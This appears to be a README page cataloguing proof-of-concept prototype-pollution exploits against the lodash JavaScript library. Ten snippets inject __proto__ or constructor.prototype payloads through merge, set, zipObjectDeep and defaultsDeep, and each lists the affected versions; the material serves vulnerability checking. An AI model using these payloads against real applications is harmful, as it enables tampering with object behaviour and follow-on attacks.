lodash

Lodash modular utilities.

Latest version: 4.17.21

Exploits

const _ = require('lodash');

_.merge({}, JSON.parse('{"__proto__": {"a": "b"}}'));
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 0.5.0-rc.1 0.5.0 0.5.1 0.5.2 0.6.0 0.6.1 0.7.0 0.8.0 0.8.1 0.8.2 0.9.0 0.9.1 0.9.2 0.10.0 1.0.0-rc.1 1.0.0-rc.2 1.0.0-rc.3 1.0.0 1.0.1 1.1.0 1.1.1 1.2.0 1.2.1 1.3.0 1.3.1 2.0.0 2.1.0 2.2.0 2.2.1 2.3.0 2.4.0 2.4.1 3.0.0 3.0.1 3.1.0 3.2.0 3.3.0 3.3.1 3.4.0 3.5.0 3.6.0 1.0.2 3.7.0 2.4.2 3.8.0 3.9.0 3.9.1 3.9.2 3.9.3 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4

const _ = require('lodash');

_.merge({}, JSON.parse('{"constructor": {"prototype": {"a": "b"}}}'));
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10

const _ = require('lodash');

_.zipObjectDeep(['__proto__.a'], ['b']);
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

const _ = require('lodash');

_.zipObjectDeep(['constructor.prototype.a'], ['b']);
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

const _ = require('lodash');

_.set({}, [['__proto__'], 'a'], 'b');
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 3.7.0 3.8.0 3.9.0 3.9.1 3.9.2 3.9.3 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

const _ = require('lodash');

_.set({}, [['constructor'], ['prototype'], 'a'], 'b');
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 3.7.0 3.8.0 3.9.0 3.9.1 3.9.2 3.9.3 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

const _ = require('lodash');

_.set({}, '__proto__.a', 'b');
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 3.7.0 3.8.0 3.9.0 3.9.1 3.9.2 3.9.3 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

const _ = require('lodash');

_.set({}, 'constructor.prototype.a', 'b');
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 3.7.0 3.8.0 3.9.0 3.9.1 3.9.2 3.9.3 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

const _ = require('lodash');

_.defaultsDeep({}, JSON.parse('{"__proto__": {"a": "b"}}'));
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4

const _ = require('lodash');

_.defaultsDeep({}, JSON.parse('{"constructor": {"prototype": {"a": "b"}}}'));
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

lodash

Exploits

Files

README.md

Latest commit

History

README.md

File metadata and controls

lodash

Exploits